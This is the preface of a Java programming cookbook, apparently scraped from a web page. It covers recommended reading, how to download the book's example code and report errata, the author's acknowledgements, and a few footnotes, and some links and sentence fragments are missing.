Head First Java offers a much more whimsical introduction to the language and is recommended for the less experienced developer. A definitive (and monumental) description of programming the Swing GUI is Java Swing by Marc Loy, Robert Eckstein, Dave Wood, James Elliott, and Brian Cole. Java Virtual Machine, by Jon Meyer and Troy Downing, will intrigue the person who wants to know more about what’s under the hood. This book is out of print but can be found used and in libraries. Java Network Programming and Java I/O, both by Elliotte Rusty Harold, and Database Programming with JDBC and Java, by George Reese, are also useful references. There are many more; see the O’Reilly web site for an up-to-date list. You should not. Donald E. Knuth’s The Art of Computer Programming has been a source of inspiration to generations of computing students since its first publication by Addison Wesley in 1968. Volume 1 covers Fundamental Algorithms, Volume 2 is Seminumerical Algorithms, and Volume 3 is Sorting and Searching. The remaining four volumes in the projected series are still not completed. Although his examples are far from Java (he invented a hypothetical assembly language for his examples), many of his discussions of algorithms—of how computers ought to be used to solve real problems—are as relevant today as they were years ago.[4] Though somewhat dated now, the book The Elements of Programming Style, by Kernighan and Plauger, set the style (literally) for a generation of programmers with examples from various structured programming languages. Kernighan and Plauger also wrote a pair of books, Software Tools and Software Tools in Pascal, which demonstrated so much good advice on programming that I used to advise all programmers to read them. However, these three books are dated now; many times I wanted to write a follow-on book in a more modern language, but instead defer to The Practice of Programming, Brian’s follow-on—co-written with Rob Pike—to the Software Tools series. This book continues the Bell Labs (now part of Lucent) tradition of excellence in software textbooks. In Recipe 3.13, I have even adapted one bit of code from their book. See also The Pragmatic Programmer by Andrew Hunt and David Thomas (Addison Wesley). agree; at the very least it’s among the best. Refactoring, by Martin Fowler, covers a lot of " coding cleanups” that can be applied to code to improve readability and maintainability. Just as the GOF book introduced new terminology that helps developers and others communicate about how code is to be designed, Fowler’s book provided a vocabulary for discussing how it is to be improved. Many of the “refactorings” now appear in the Refactoring Menu of the Eclipse IDE (see Recipe 1.3). Two important streams of methodology theories are currently in circulation. The first is collectively known as Agile Methods, and its best-known member is Extreme Programming. XP (the methodology, not last year’s flavor of Microsoft’s OS) is presented in a series of small, short, readable texts led by its designer, Kent Beck. A good overview of all the Agile methods is Highsmith’s Agile Software Development Ecosystems. The first book in the XP series is Extreme Programming Explained. Another group of important books on methodology, covering the more traditional object-oriented design, is the UML series led. This. As mentioned earlier, I’ve tested all the code on at least one of the reference platforms, and most on several. Still, there may be platform dependencies, or even bugs, in my code or in some important Java implementation. Please report any errors you find, as well as your suggestions for future editions, by writing to: To ask technical questions or comment on the book, send email to: An O’Reilly web site for the book lists errata, examples, and any additional information. You can access this page at: I also have a personal web site for the book: Both sites list errata and plans for future editions. You’ll also find the source code for all the Java code examples to download; please don’t waste your time typing them again! For specific instructions, see the next section. From my web site, just follow the Downloads link. You are presented with three choices: Download the entire source archive as a single large zip file. Download individual source files, indexed alphabetically as well as by chapter. Download the binary JAR file for the com.darwinsys.* package needed to compile many of the other programs. Most people will choose either option 1 or 2, but anyone who wants to compile my code will need option 3. See Recipe 1.5 for information on using these files. Downloading the entire source archive yields a large zip file with all the files from the book (and more). This archive can be unpacked with jar (see Recipe 23.4), the free zip program from Info-ZIP, the commercial WinZip or PKZIP, or any compatible tool. The files are organized into subdirectories by topic, with one for strings (Chapter 3), regular expressions (Chapter 4), numbers (Chapter 5), and so on. The archive also contains the index by name and index by chapter files from the download site, so you can easily find the files you need. Downloading individual files is easy, too: simply follow the links either by file/subdirectory name or by chapter. Once you see the file you want in your browser, use File → Save or the equivalent, or just copy and paste it from the browser into an editor or IDE. The files are updated periodically, so if there are differences between what’s printed in the book and what you get, be glad, for you’ll have received the benefit of hindsight. My life has been touched many times by the flow of the fates bringing me into contact with the right person to show me the right thing at the right time. Steve Munroe, with whom I’ve long since lost touch, introduced me to computers—in particular an IBM 360/30 at the Toronto Board of Education that was bigger than a living room, had 32 or 64K of memory, and had perhaps the power of a PC/XT—in 1970. Herb Kugel took me under his wing at the University of Toronto while I was learning about the larger IBM mainframes that came later. Terry Wood and Dennis Smith at the University of Toronto introduced me to mini- and micro-computers before there was an IBM PC. On evenings and weekends, the Toronto Business Club of Toastmasters International () and Al Lambert’s Canada SCUBA School allowed me to develop my public speaking and instructional abilities. Several people at the University of Toronto, but especially Geoffrey Collyer, taught me the features and benefits of the Unix operating system at a time when I was ready to learn it. Greg Davidson of UCSD taught the first Learning Tree course I attended and welcomed me as a Learning Tree instructor. Years later, when the Oak language was about to be released on Sun’s web site, Greg encouraged me to write to James Gosling and find out about it. James’s reply of March 29th, 1995, that the lawyers had made them rename the language to Java and that it was “just now” available for download, is the prized first entry in my saved Java mailbox. Mike Rozek took me on as a Learning Tree course author for a Unix course and two Java courses. After Mike’s departure from the company, Francesco Zamboni, Julane Marx, and Jennifer Urick in turn provided product management of these courses. Jennifer also arranged permission for me to “reuse some code” in this book that had previously been used in my Java course notes. Finally, thanks to the many Learning Tree instructors and students who showed me ways of improving my presentations. I still teach for “The Tree” and recommend their courses for the busy developer who wants to zero in on one topic in detail over four days. Their web site is. Closer to this project, Tim O’Reilly believed in “the little Lint book” when it was just a sample chapter, enabling my early entry into the circle of O’Reilly authors. Years later, Mike Loukides encouraged me to keep trying to find a Java book idea that both he and I could work with. And he stuck by me when I kept falling behind the deadlines. Mike also read the entire manuscript and made many sensible comments, some of which brought flights of fancy down to earth. Jessamyn Read turned many faxed and emailed scratchings of dubious legibility into the quality illustrations you see in this book. And many, many other talented people at O’Reilly helped put this book into the form in which you now see it. I also must thank my first-rate reviewers for the first edition, first and foremost my dear wife Betty Cerar, who still knows more about the caffeinated beverage that I drink while programming than the programming language I use, but whose passion for clear expression and correct grammar has benefited so much of my writing during our life together. Jonathan Knudsen, Andy Oram, and David Flanagan commented on the outline when it was little more than a list of chapters and recipes, and yet were able to see the kind of book it could become, and to suggest ways to make it better. Learning Tree instructor Jim Burgess read most of the first edition with a very critical eye on locution, formulation, and code. Bil Lewis and Mike Slinn (mslinn@mslinn.com) made helpful comments on multiple drafts of the book. Ron Hitchens (ron@ronsoft.com) and Marc Loy carefully read the entire final draft of the first edition. I am grateful to Mike Loukides for his encouragement and support throughout the process. Editor Sue Miller helped shepherd the manuscript through the somewhat energetic final phases of production. Sarah Slocombe read the XML chapter in its entirety and made many lucid suggestions; unfortunately time did not permit me to include all of them in the first edition. Each of these people made this book better in many ways, particularly by suggesting additional recipes or revising existing ones. The faults that remain are my own. I used a variety of tools and operating systems in preparing, compiling, and testing the first edition. The developers of OpenBSD (), “the proactively secure Unix-like system,” deserve thanks for making a stable and secure Unix clone that is also closer to traditional Unix than other freeware systems. I used the vi editor (vi on OpenBSD and vim on Windows) while inputting the original manuscript in XML, and Adobe FrameMaker to format the documents. Each of these is an excellent tool in its own way, but I must add a caveat about FrameMaker. Adobe had four years from the release of OS X until I started this book revision cycle during which they could have produced a current Macintosh version of FrameMaker. They did not do so, requiring me to do the revision in the increasingly ancient Classic environment. Strangely enough, their Mac sales of FrameMaker dropped steadily during this period, until, during the final production of this book, Adobe officially announced that it would no longer be producing any Macintosh versions of this excellent publishing software, ever. No book on Java would be complete without a quadrium[5] of thanks to James Gosling for inventing the first Unix Emacs, the sc spreadsheet, the NeWS window system, and Java. Thanks also to his employer Sun Microsystems (NASDAQ SUNW) for creating not only the Java language but an incredible array of Java tools and API libraries freely available over the Internet. Thanks to Tom and Nathan for the Perl Cookbook. Without them I might never have come up with the format for this book. Willi Powell of Apple Canada provided Mac OS X access in the early days of OS X; I currently have an Apple notebook of my own. Thanks also to Apple for basing OS X on BSD Unix, making Apple the world’s largest-volume commercial Unix company. Thanks to the Tim Horton’s Donuts in Bolton, Ontario for great coffee and for not enforcing the 20-minute table limit on the geek with the computer. To each and every one of you, my sincere thanks. [1] The first edition is available today in English, German, French, Polish, Russian, Korean, Traditional Chinese, and Simplified Chinese. My thanks to all the translators for their efforts in making the book available to a wider audience. [2] One of the world’s leading high-tech, vendor-independent training companies; see. [3] Note that not all packages named javax. are extensions: javax.swing and its subpackages—the Swing GUI packages—used to be extensions, but are now core. [4] With apologies for algorithm decisions that are less relevant today given the massive changes in computing power now available. No credit card required
https://www.oreilly.com/library/view/java-cookbook-2nd/0596007019/pr03.html
CC-MAIN-2019-18
refinedweb
5,040
61.16
The problem is (not really a problem), that the program is running too fast and doesn't have anything to stop it from closing. There are a number of options to solve this, most of them are mentioned here -- so if you're using C++ throw a cin.ignore(); and cin.get(); before you return 0; at the end of your program here at home i'm using dev c++ and i do get the same "problem" i use system("pause") which i think is not preferred by others,but it's just me using it to see the output then i just remove it when i'm at school because there we use visual c++ OR run the program with the command prompt Don't use Both are non-portable. Instead, do it the C++ way: #include <iostream> #include <limits> void pause() { std::cout << "Press ENTER to continue... "; std::cin.ignore( std::numeric_limits<streamsize>::max(), '\n' ); } Now if you want to pause, just use the function: int main() { using namespace std; string name, color; cout << "WHAT, is your NAME!?\n"; getline( cin, name ); cout << "WHAT, is your favorite COLOR!?\n"; getline( cin, color ); cout << "Aaaiiiiiieeeee!\n"; pause(); } Hope this helps. Non portable means that the code won't work on all systems -- suppose you were to compile on one system it might work but that doesn't mean it will compile on all systems. Using system is a bad idea for pausing. getch() is a lazy excuse. Duoas' solution is good. Use that. No idea about pause, but the warning is solved by putting a return 0; before the closing } in main: int main() { // Your code return 0; } Edit: post double posted. Could an obliging moderator delete this one please? what does non-portable mean ?? and what does pause(); do? pause() is a self defined function made by duoas but i think a plain cin.ignore() works fine or maybe it's just me on my compiler though Sorry about that missing return 0; . Thanks twomers! The reason I made a pause() function is two-fold: cin.ignore();is dangerous, because you don't know how it will leave the state of input. Remember, console input is usually line-buffered, meaning that the user must press ENTER at the end of everything he types. A good UI always tells the user exactly what is expected, then presumes that the user may do something stupid anyway. My pause() function does both. Hope this helps.
https://www.daniweb.com/programming/software-development/threads/107329/output-window-disappears-instantly
CC-MAIN-2016-50
refinedweb
414
81.22
A method in Java, like a function in C/C++ (in fact, a function of C/C++ is called a methods in Java), embeds a few statements. A method is delimited (separated) from the remaining part of the code by a pair braces. Method increases reusability. When the method is called number of times, all the statements are executed repeatedly. Java comes with static methods, final methods and abstract methods. All the three varies in their functionalities. This "Java Method Example" tutorial gives with normal methods. Other methods you can refer this site later. Java Method Example public class Demo { public void display() // a method without any parameters { System.out.println("Hello World"); } public void calculate(int length, int height) // a method with parameters { System.out.println("Rectangle Area: " + length*height); } public double show(double radius) // a method with parameter and return value { System.out.println("Circle Area: " + Math.PI*radius*radius); return 2*Math.PI*radius; } public static void main(String args[]) { Demo d1 = new Demo(); // create object to call the methods d1.display(); d1.calculate(10, 20); double perimeter = d1.show(5.6); System.out.println("Circle Perimeter: " + perimeter); } } Three methods are given with different variations and called from main() method. To call a method, an object is required. An object d1 of Demo class is created and called all the methods. 1. How to write methods, how to call variables from methods is discussed with good notes in Using Variables from Methods. 2. More in depth study is available at Using Methods and Method Overloading .
https://way2java.com/uncategorized/java-method-examples/
CC-MAIN-2022-33
refinedweb
258
51.44
An interface to SAT solver tools (like minisat) Project description Satispy is a Python library that aims to be an interface to various SAT (boolean satisfiability) solver applications. Supported solvers: - [MiniSAT]() (Linux) - [Lingeling]() (Linux, Cygwin) Support for other solvers should be fairly easy as long as they accept the [DIMACS CNF SAT format](). Installing You can grab the current version from pypi: $ sudo pip install satispy Or you can download a copy from, and runs $ sudo ./setup.py install in the directory of the project. If you want to develop on the library, use: $ ./setup.py develop You can run the tests found in the test folder by running run_tests.py. How it works You need a SAT solver and numpy to be installed on your machine for this to work. Let’s see an example: from satispy import Variable, Cnf from satispy.solver import Minisat v1 = Variable(‘v1’) v2 = Variable(‘v2’) v3 = Variable(‘v) Project details Release history Release notifications Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/satispy/
CC-MAIN-2018-39
refinedweb
182
62.38
Learning boo if you are familiar with Python It might come as no surprise to anyone but I'd better state it here anyway: boo is not python. It looks a lot like python and there's a reason for that: we love python! Specially The dirty hungarian phrasebook General Tips The .NET Framework (Windows) or Mono (Linux,Windows,Mac) is required to run or compile boo programs. .NET Assemblies Instead of using the python standard library and python modules, you will be using compiled assemblies. You have access to the standard class library that is included with .NET and Mono. There are many 3rd party .NET libraries available as well. See the General Help page for a list of some, as well as pointers to more .NET information. GUI Toolkits For GUI programming the two predominant options are System.Windows.Forms and GTK#. See the General Help page for links to tutorials for learning how to use those GUI toolkits. General things in common with Python Syntax-wise, boo is very similar to python. Like python, you indent code blocks instead of using curly braces {}. Methods look like python methods (except for the optional static type declarations): See the Language Guide for info on lists, dictionaries, classes, for loops, generators, list comprehensions, etc. Boo also has an Interactive Interpreter like Python. Duck Typing vs. Static Typing This is the major functional difference between boo and python (other than the fact that boo runs on .NET and Mono). See Duck Typing for a more in-depth explanation. In Python, everything is duck typed implicitly. Type-specific operations are not resolved until run-time. In boo, everything is implicitly static typed at compile time. You often do not have to explicitly declare the type, due to boo's Type Inference mechanism. For example, you can still simply state "x = 4" instead of having to state "x as int = 4". You can however specify that an object is to be duck typed by explicitly declaring its type as "duck". Also, boo now has an option that turns on implicit duck typing by default, which makes coding in boo much more like python. Again, see Duck Typing for more info. Specific Differences Between Python & Boo Print can be called as a function or as a statement: See Syntactic Macros for other useful macro statements in boo such as assert, debug, using, lock, with, and performTransaction. Embedding variables in a string Use a $ sign followed by the variable name or $ sign followed by the expression enclosed in parentheses: You can triple quote strings too just like python. See String Operations for more info. Importing Importing automatically puts everything into the namespace, just like C#. So when you import an assembly, it is like saying "from MyLibrary import *" in Python. If you import two or more libraries that have the same named item, the compiler will tell you, and you can use the fully qualified name ("MyLibrary.Version" instead of just "Version"). Commenting Boo supports Python-style commenting, but also C++ commenting: Lists, Arrays, Slicing, Generators You can do all the same list operations, list comprehensions, slicing, and generators as in python. Instead of tuples however, there are C-like arrays - fixed length and of a particular type. See Lists And Arrays, Slicing, and Generators for more information. Dictionaries / Hashtables In boo, {} is a Boo.Lang.Hash class, which subclasses System.Collections.Hashtable, but it works similar to Python dictionaries. See Hashtables. No "self" required! In Python, you use "self" to signify instance variables and instance methods of classes: In boo, you can just use: You do not need to declare "self" as the first parameter of an instance method of a class. And you can still use "self.x" but the self is optional. In boo, "self" basically means the same as "this" in C#. _init, __del_ (Constructors & Destructors) Instead of _init_(self), define a method named "constructor()" in your class. "destructor()" is used for destructors. Main & argv (command line arguments) Instead of if name == _main_: "argv" is passed to your script as an array of strings. See examples/download.boo, or you can call Environment.GetCommandLineArgs(). Note though, the "main" (or global) part of your script that is executed when run has to be at the bottom of the script, below any import statements, classes, or def functions. See Structure of a Boo Script. Documentation strings In Boo, docstrings must start at the same indentation level as the class/method/function/callable definition, and you must use triple quoted strings: There is an advantage to doing it this way. In Boo, we can use docstrings for anything, including properties, fields, namespaces, and modules, as well as classes and functions. See tests/testcases/parser/docstrings_1.boo for a more complete example. We can convert these docstrings into an XML format which the NDoc tool can then use to generate nicely formatted HTML documentation for your code. Or you can try the Monodoc approach instead. You pass it your compiled exe or dll, and write your user documentation externally and separately from your code. This lets you focus on making your code as simple and readable as possible, and not over-cluttering it with docstrings. true and false Booleans true and false are not capitalized like in Python. They are lowercase like in C#, javascript, java, and other languages. char vs. string In Python, there really is no special "char" type, like in .NET. You just use strings with a single character, like 't'. Since Boo utilizes the .NET Class Library and is statically typed, it needs that distinction, however. char('t') refers to a System.Char type, whereas "t" or 't' is a System.String. Static vs. Instance fields and methods In Python, you might refer to a static field shared by all class instances using notation like "MyClass.y". It is the same in boo. To create a static field or method like this that is shared by all class instances, use the static keyword: "static public y" or "static def mymethod():". NOTE Any fields or constants you declare in a class are by default "protected" and not accessible from outside the class (methods or properties are by default public). Add a "public" modifier in front of the field to make it accessible, or else create a property instead (with a getter and setter, see example in later section). Named parameters, Assignment Expressions, Set Properties via Constructor Boo doesn't support named parameters. It does however support setting properties via the call to the constructor of a class. For example this code: is essentially the same as this: Thus X and Y must refer to public fields or properties, not private or protected fields. You can also see see why the constructor in the Point class doesn't need to handle the X and Y parameters itself. In fact your Point class doesn't even need a constructor. If your class doesn't have a constructor, Boo will generate it for you. Why a colon ( instead of an equal sign (=)? Because in boo assignments (like x=100) are expressions that are evaluated, not just statements like in python. If you pass "x=100" to a method, for example, it will essentially pass the value 100, after assigning 100 to the variable x. Boo supports handling a variable number of parameters using the same syntax as python (*params). _str_ (String representation) Instead of _str_ or _repr_, define a ToString() method in your class. Overloading operators: _add, __mult_ See Operator overloading. _call_ (Callable) In Python, you might override the _call_ method in a class to make it callable. In boo, check out options like Callable Types, the ICallable interface, Events, and anonymous Closures. __ (double underscore for private variables) Use the private modifier: "private x as int" Properties (with Getter, Setter) Instead of x = property(getter,setter) use syntax like the below: or you quickly create a property with the default getter and setter like so: See the .NET docs on properties for more info. Decorators/Attributes Instead of boo has attributes (see .NET's docs on attributes). _name, __class, __file_ See the .NET documentation under System.Reflection on Types and GetType. You can inspect a class for example like this: Instead of _file_, there are related options like: Pickle (saving and loading objects) See XML Serialization, especially the bottom example showing how to save and load a dictionary/hashtable. Things in Python But Not Boo Importing and dynamic importing (_import_) of other python files Not available in boo, but see examples/pipeline/AutoImport. You can only import compiled assemblies. The autoimport example compiles the other boo script to an assembly and then imports it. Note: To combine multiple boo scripts into one boo application, instead of importing one script from another script like in python, you would pass all your boo scripts to the compiler (booc) at the same time. See How To Compile boo scripts. When creating more complex applications in boo that require multiple scripts, I recommend using the SharpDevelop IDE with the boo add-in on Windows, or else Nant, a .NET build tool similar to java's ant. On Linux, there is now a boo add-in for the MonoDevelop IDE. Dynamically modify class methods on the fly after creation The default classes in boo are statically typed. You cannot change or add methods to a class instance at runtime. But using duck typing there are ways to simulate the dynamic behavior of python classes. See the examples below, especially the 2nd and 3rd ones. - basic duck type example - Python-like class using IQuackFu - Dynamic XML object example using IQuackFu - Dynamic Inheritance - fun with IQuackFu - System.Remoting, an alternative to IQuackFu in some cases: RealProxy example Things in Boo but Not Python - quickly compile boo script to standalone cross-platform exe - easy super(), and constructor automatically calls super() for you. If you don't have a constructor, one is created for you. - set class properties via the constructor (constructor doesn't have to handle them explicitly): - Anonymous Closures - including multi-line closures: - Events, Callable Types - unless statement: print "good job" unless score < 75 - built-in support for Regular Expressions - timespan literals (example: t = 10ms) - extensible compiler pipeline - custom Syntactic Macros since boo is statically typed, you get: - static typing: "x as int" but you can just say "x" (x is an object) - Interfaces, Enums - private,public,protected,final,etc. variables & methods - speed increases - without having to convert your code to a different language like C - easier interoperability since boo uses standard CLI types (e.g. string is System.String, int is a System.Int32...) - convert C# and VB.NET to boo code (part of the Boo AddIn For SharpDevelop) other C#/.NET features you get: - "lock" (like java's synchronized). See the lock* examples under tests/testcases/semantics/. - property getters and setters - using: (automatically disposes of object when you are done using it) - parameter checking - [attributes] for functions, fields, classes... - asynchronous execution, see Asynchronous Design Pattern. - XML Serialization
http://docs.codehaus.org/pages/diffpages.action?originalId=233046376&pageId=7559
CC-MAIN-2015-14
refinedweb
1,838
65.01
I am suppose to use arrays where i read in data from a text file and i have to set these functions to it. any clues on how i would approach it. my main concern is how to read data from a file using class while using arrays. i know how to do it in main function but i am confused about using it with class. would i read it with a function in side the class? or inside main and pass it inside class (if this is even doable). Please help.. thanks in advance. #include<iostream> #include<string> using namespace std; class AtmMachine{ public: void getAccountNumber(); void setAccountNumber(); void getAccountHolderName(); void setAccountHolderName(); void getCurrentBalance(); void setCurrentBalance(); void add2CurrentBalance(); void subtractFromCurrentBalance(); customerAccounts[500]; actulCustomerNumber[]; private: string fName; string lName; int accountNum; int currentBalance; int pinNum; }; int main() { }
https://www.daniweb.com/programming/software-development/threads/329440/atm-machine
CC-MAIN-2017-17
refinedweb
137
54.42
ASP.NET 3.5 AJAX Unleashed Introduction Nowadays, many web developers have implemented AJAX in their web applications. This enables them to create dynamic, rich web sites. There are numerous resources available on the web for learning ASP.NET 3.5 AJAX, but it is always nice to refer to a book as and when required. In his latest book, ASP.NET 3.5 AJAX Unleashed, Robert Foster examines the relevant concepts in less than 300 pages, which I think is excellent and is rarely achieved by authors. It is hard to write short and crispy content, especially on ASP.NET related concepts, but Robert has worked really well to bring out a quality book for budding developers very effectively. The book is mainly divided into three parts including two appendixes. Inside the Book The chapters in part 1 provide a brief overview about AJAX and introduce the controls shipped with Visual Studio. This section also provides a sneak preview of the AJAX Control Toolkit. The author has provided complete source code along with relevant screenshots. Part 2 consists of the core chapters which help you learn ASP.NET AJAX 3.5 starting from the basics. While chapter 3 examines the ScriptManager and ScriptManagerProxy controls, Chapter 4 provides nice coverage of various namespaces such as Sys, Sys.Net, Sys.Serialization, Sys.UI, etc. Chapters 5 and 6 help you to learn about the UpdatePanel, Timer controls, and also some of the advanced techniques associated with the ASP.NET AJAX PageRequestManager object. Chapter 7 provides detailed coverage of various controls included with the AJAX Control Toolkit with the help of a practical example. The author also examines the role of Expression Web in the development of AJAX applications. I think this chapter will be very useful for beginners. The book then delves deeply into the steps involved in the development of an Extender Control with the help of both server and client side controls. A key feature of the book is that the author has provided detailed analysis in a lucid style along with each bit of source code. Chapter 9 examines the role of SharePoint 2007 in the development of AJAX based applications. It also includes a practical example which illustrates the development of SharePoint WebParts powered by AJAX. You should be familiar with Gadgets if you work with the Windows Vista operating system, and the final chapter examines the creation of vista sidebar gadgets with the help of AJAX. It includes a detailed explanation of each step starting with the creation of web service and ending with testing the gadget. I would prefer to see the screenshots in color in the next edition of the book. The book also includes two appendixes which provide a brief overview of expression web and also examine the steps required to deploy .NET 3.5 as a SharePoint feature. I expected a little bit more advanced content especially in the areas of LINQ. It would be helpful if the author had devoted a chapter to discuss the implementation of an AJAX based billing solution as a mini project. Conclusion The book will be useful for beginners and intermediates and I would recommend it for those developers who would like to learn ASP.NET 3.5 AJAX quickly. This book can also be used by those developers who are averse to reading bulky books. The author has done a terrific job of restricting the content in less than 300 pages and I must say that the book is an ideal supplement for online resources.
http://www.dotnetspider.com/resources/26669-ASP-NET-AJAX-Unleashed.aspx
CC-MAIN-2018-43
refinedweb
590
63.8
Reimporting sections using CSV does not work anymore Bug Description Section CSV import mentions that if you try importing the same CSV twice - nothing changes, and you can also Update timetables importing a CSV with the same section titles. Wel - you can't anymore, because timetable update subscribers are not implemented properly or some events are not firing the way they should, so you get a traceback. Yes, both for XLS and CSV importers i am afraid, though I have yet to test it on XLS to be sure. The instruction currently is - do not import new sections on top of the old ones... Investigate this at least prior to release. Please double-check this before the Maverick release, Justas. What traceback? This bug has been dragging so long, does anyone know what problem it is? In flourish timetables have been changed completely and it is true that you cannot import an old CSV. But some subscribers may be the same and still broken, no idea. Played around with this one, here's the status: For old skin, section CSV import is not implemented with new timetables. For flourish skin, CSV import works, but *always* creates a new section. It works this way, because it's unclear what combination of course/ What we can do: a) Nothing - users just won't use CSV import to modify existing sections. No help text says otherwise. b) Force users to figure out section id from URL in case they want to modify existing section. c) Try to guess somehow what sections user may want to overwrite with each entry in CSV, list them, make user choose + "[ ] create new section". d) something else? Added section id to csv Is this still relevant?
https://bugs.launchpad.net/schooltool/+bug/251866
CC-MAIN-2016-07
refinedweb
288
71.55
#include <TextExtractor.h> List of all members. The class includes information about the font, font size, font styles, text color, etc. A high level font object can be instantiated as follows: In C++: pdftron.PDF.Font f(style.GetFont()) In C#: pdftron.PDF.Font f = new pdftron.PDF.Font(style.GetFont()); The possible values are 100, 200, 300, 400, 500, 600, 700, 800, or 900, where each number indicates a weight that is at least as dark as its predecessor. A value of 400 indicates a normal weight; 700 indicates bold. Note: The specific interpretation of these values varies from font to font. For example, 300 in one font may appear most similar to 500 in another.
http://www.pdftron.com/net/html/classpdftron_1_1PDF_1_1TextExtractor_1_1Style.html
crawl-001
refinedweb
117
67.96
Other Information / API for other plugins API for other plugins Logging Data It is incredibly easy for other plugins to log their own data to HawkEye so that server owners can see as much information as possible about their server. It takes one import and a single line of code for basic usage. - Add HawkEye.jaras an External Jar in your IDE. - Import uk.co.oliwali.HawkEye.util.HawkEyeAPIinto any classes where you want to log to HawkEye. When you want to log something, use the method: HawkEyeAPI.addCustomEntry(JavaPlugin plugin, String action, Player player, Location location, String data); Use the action parameter to differentiate between different types of actions your plugin logs. Use only alphanumeric characters and spaces in your action names. Basic Example using a 'Home' plugin The following logs to HawkEye everytime a player 'goes home'. It logs the 'data' part as the ID of the home in the database. Please note that the following will force your users to use HawkEye (it doesn't check if the plugin is loaded or not). private void goHome(Player player, Home home) { Location loc = home.getLocation(); player.teleport(loc); HawkEyeAPI.addCustomEntry(this, "Go Home", player, loc, home.getId()); } Other uses of the data field could be for the ban reason in a ban plugin or winner of the fight in a war plugin, for example. Advanced example that checks if HawkEye is loaded This example checks if HawkEye exists first, making it optional for your plugin users. public class MultiHome extends JavaPlugin { public boolean usingHawkEye = false; public void onEnable() { Plugin dl = getServer().getPluginManager().getPlugin("HawkEye"); if (dl != null) this.usingHawkEye = true; } private void goHome(Player player, Home home) { Location loc = home.getLocation(); player.teleport(loc); if (this.usingHawkEye) HawkEyeAPI.addEntry(this, "Go Home", player, loc, home.getId()); } Logging normal HawkEye events he normal HawkEye events like block breaks can all be logged from the API too. Simply use this API method instead: HawkEyeAPI.addEntry(JavaPlugin plugin, DataType type, Player player, Location location, String data); DataType is located at uk.co.oliwali.HawkEye.DataType Retrieving data Retrieving data is a little bit more complicated than adding to the database. You need to create your own 'callback' object for the search engine to call once it is done retrieving results. The basic method you need to call is this: HawkEyeAPI.performSearch(BaseCallback callBack, SearchParser parser, SearchDir dir); Creating a BaseCallback class To perform a search you need to use an instance of a class extending BaseCallback. There are two built-in callbacks that you can use if need be, although they are designed for very specific uses inside HawkEye. These can be found in the callbacks package: uk.co.oliwali.HawkEye.callbacks. You will more than likely need to create your own BaseCallback class. This class is outlined here: public abstract class BaseCallback { /** * Contains results of the search. This is set automatically before execute() is called */ public List<DataEntry> results = null; /** * Called when the search is complete */ public abstract void execute(); /** * Called if an error occurs during the search */ public abstract void error(SearchError error, String message); } Here is an example of a very simple extension of BaseCallback public class SimpleSearch extends BaseCallback { private Player player; public SimpleSearch(Player player) { player.sendMessage("Search database..."); } public void execute() { player.sendMessage("Search complete. " + results.size() + " results found"); } public void error(SearchError error, String message) { player.sendMessage(message); } } Creating a SearchParser instance Obviously you need to give the search engine some parameters to build a query out of. This is done by using the SearchParser class, found here: uk.co.oliwali.HawkEye.SearchParser There are four constructors available. Two are mainly for internal HawkEye commands, whilst the others are more general: public SearchParser() { }- this is the constructor you will most likely use public SearchParser(Player player) { }- use this one if you are searching due to some kind of player input public SearchParser(Player player, int radius) { }- this is used for 'radius' searching in HawkEye public SearchParser(Player player, List<String> args) throws IllegalArgumentException { }- used for HawkEye user-inputted search parameters SearchParser contains public methods that you can set to whatever you like. They are all optional, but bear in mind if you supply nothing, you won't get any results! The methods are outlined here: public Player player = null;- Player that has called initiated the search somehow public String[] players = null;- Array of player names to search for. Can be partial public Vector loc = null;- Location to search around public Vector minLoc = null;- Minimum corner of a cuboid to search in public Vector maxLoc = null;- Maximum corner of a cuboid to search in public Integer radius = null;- Radius to search around public List<DataType> actions = new ArrayList<DataType>();- List of DataType actions to search for public String[] worlds = null;- Array of worlds to search for. Can be partial public String dateFrom = null;- Date to start the search from public String dateTo = null;- Date to end the search at public String[] filters = null;- Array of strings to use as filters in the data column If you set the location and/or radius, you should then call the parseLocations() method to sort out the locations into proper minLoc and maxLoc values. If you set radius but no location and then call parseLocations() you MUST have set player, otherwise you shouldn't have set radius. Here is an example of a very simple setup of a SearchParser: SearchParser parser = new SearchParser(); parser.player = player; parser.radius = 5; parser.actions = Arrays.asList({DataType.BLOCK_BREAK, DataType.BLOCK_PLACE}); parser.parseLocations(); This will search 5 blocks around the player for block breaks and block places SearchDir SearchDir is an enumerator representing the direction to list search results in. Simply import the class and specify SearchDir.DESC or SearchDir.ASC Putting it all together So now we have got our BaseCallback written and our SearchParser instance created, we just need to put it together: //Setup a SearchParser instance and set values SearchParser parser = new SearchParser(); parser.player = player; parser.radius = 5; parser.actions = Arrays.asList({DataType.BLOCK_BREAK, DataType.BLOCK_PLACE}); parser.parseLocations(); //Call search function performSearch(new SimpleSearch(player), parser, SearchDir.DESC); This will search 5 blocks around the player for block break and block place. When the search is done the callback class tells the player how many results were found. - 1 comment - 1 comment Table of contents Facts - Date created - Aug 25, 2011 - Last updated - Aug 25, 2011 The JavaDocs link is dead. Please update.
http://dev.bukkit.org/bukkit-plugins/hawkeye/pages/other-information/api-for-other-plugins/
CC-MAIN-2014-35
refinedweb
1,074
53.31
An array variable holds a single list value (zero or more scalar values). Array variable names are similar to scalar variable names, differing only in the initial character, which is an at sign (@) rather than a dollar sign ($). For example: @fred # the array variable @fred @A_Very_Long_Array_Variable_Name @A_Very_Long_Array_Variable_Name_that_is_different Note that the array variable @fred is unrelated to the scalar variable $fred. Perl maintains separate namespaces for different types of things. The value of an array variable that has not yet been assigned is (), the empty list. An expression can refer to array variables as a whole, or it can examine and modify individual elements of the array. No credit card required
https://www.oreilly.com/library/view/learning-perl-second/1565922840/1565922840_ch03-35363.html
CC-MAIN-2019-43
refinedweb
110
55.54
